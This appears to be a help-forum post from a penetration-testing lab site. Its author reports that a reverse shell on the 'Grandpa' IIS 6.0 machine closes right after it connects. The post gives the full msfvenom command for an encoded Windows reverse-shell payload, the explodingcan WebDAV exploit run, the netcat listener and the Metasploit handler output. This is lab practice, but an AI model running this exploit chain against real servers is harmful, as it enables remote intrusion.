Grandpa reverse TCP immediately closes after sending exploit

Hey Guys,

I am trying to pop Grandpa without Metasploit. For this, I want to use explodingcan as it seems the most straight-forward.

However, when I am sending my payload, I get a connection which immediately disappears again.

msfvenom -p windows/shell_reverse_tcp -f raw -v -sc -e x86/alpha_mixed LHOST=10.10.x.x LPORT=1337 EXITFUNC-thread -o shellcode
[email protected]:~# python explodingcan.py http://10.10.10.14 shellcode 
[*] Using URL: http://10.10.10.14
[*] Server found: Microsoft-IIS/6.0
[*] Found IIS path size: 18
[*] Default IIS path: C:\Inetpub\wwwroot
[*] WebDAV request: OK
[*] Payload len: 2187
[*] Sending payload...
[email protected]:~# nc -lvnp 1337
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.10.10.14.
Ncat: Connection from 10.10.10.14:1053.

I also tried setting up a staged payload instead and handling it with the multi/handler in Metasploit. However, the problem persists.

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.x.x:1032 
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.10.10.14
[*] Command shell session 1 opened (10.10.x.x:1032 -> 10.10.10.14:1034) at 2019-07-08 20:53:21 +0200


[*] 10.10.10.14 - Command shell session 1 closed.  Reason: User exit
Tagged:
Sign In to comment.